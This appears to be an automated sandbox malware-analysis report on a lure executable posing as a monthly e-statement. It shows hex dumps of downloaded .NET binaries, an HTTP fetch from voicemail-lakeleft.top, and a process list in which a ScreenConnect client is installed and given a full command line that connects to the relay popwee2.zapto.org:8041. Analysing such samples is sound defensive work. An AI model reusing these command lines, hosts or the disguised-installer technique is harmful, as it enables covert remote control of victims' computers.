                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16384INData Raw: 7b 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30
                                                                                                                                                                                                                                                                  Data Ascii: {=,{=o"{<,{<o",o"(`&*4iA5$0J( "(,("?}s~(s}ts}q*0){x(t|x(+3*0
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16384INData Raw: 28 d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04
                                                                                                                                                                                                                                                                  Data Ascii: (+~s`(!+(%-&(oA(*~**(oA(~oo*.(o^*.(oD*.(oJ*.(oL*.(oH*.(oB*.(oD*.(oF*.(oD*.(ob*.(od*.(of*.(
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16384INData Raw: 0a 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9
                                                                                                                                                                                                                                                                  Data Ascii: %(!+*0EAs}s(+~%-&~s%(+*0.B~r@pd(o,o"*"(s(,#(o(**V(-s*s*f(-s
                                                                                                                                                                                                                                                                  2024-11-08 10:09:41 UTC16384INData Raw: 6f fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06
                                                                                                                                                                                                                                                                  Data Ascii: o((((*v(#% o% o*0(,+((((,((s;*(((((-d(((((-?(((((-((((


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  12192.168.2.749825194.59.30.2014432628C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-11-08 10:09:42 UTC97OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  Content-Length: 548864
                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:09:42 GMT
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 06 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72
                                                                                                                                                                                                                                                                  Data Ascii: &*{l*"}l*:(<(m*0(<oF{n-(++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80
                                                                                                                                                                                                                                                                  Data Ascii: :(}+(~+&*0TBE +(s+0s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 00 d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00
                                                                                                                                                                                                                                                                  Data Ascii: o:3*oXo(Y+s9*%-&~o~%-&~s%(+(n(r+*n((*>s%}*s'~%-&Ds;%(+*(+(+-j+j(L(+*&f__`*v(
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a
                                                                                                                                                                                                                                                                  Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28
                                                                                                                                                                                                                                                                  Data Ascii: (jX}{~*(+*0)Q{(+tO|(+3*0)Q{(-tO|(+3*V(6}}*{*{*Z(>Z((?X*(=u}u}*(c,{(
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07
                                                                                                                                                                                                                                                                  Data Ascii: o-,o*290Dyo+&ooo(o(o-,o*29(<}=}>}?}@}A*{=*{>*{?*{@*{A*0G*~-:~(,~
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00
                                                                                                                                                                                                                                                                  Data Ascii: :j******0iY(`(2*sjz(<*.s2*(<*2{3oB*(<*6{o{*(<*6{o{*.s8*(<*"(]*"(c*(<*0{;(+d(zo6*0
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a
                                                                                                                                                                                                                                                                  Data Ascii: (V*(<*6{/o0*6{/o0*(<*J{"{#(1*(<*J{'{((1*.s%*(<*o"*oC*.s(*(<*oC*.s**(<*"(R*:NoC*.s-*(<*:oC*(<*
                                                                                                                                                                                                                                                                  2024-11-08 10:09:43 UTC16384INData Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03
                                                                                                                                                                                                                                                                  Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5


                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                  Start time:05:09:15
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe"
                                                                                                                                                                                                                                                                  Imagebase:0xf20000
                                                                                                                                                                                                                                                                  File size:83'376 bytes
                                                                                                                                                                                                                                                                  MD5 hash:27BD2490FD75556AAB2DF57EA7C1147F
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                  Start time:05:09:16
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                                  Imagebase:0x1e8b1f20000
                                                                                                                                                                                                                                                                  File size:24'856 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                  Start time:05:09:16
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                  Start time:05:09:18
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                  Start time:06:44:38
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                                  Imagebase:0xe10000
                                                                                                                                                                                                                                                                  File size:601'376 bytes
                                                                                                                                                                                                                                                                  MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                  Start time:06:44:38
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"
                                                                                                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                                                                                                  File size:95'520 bytes
                                                                                                                                                                                                                                                                  MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                                  Start time:06:44:39
                                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
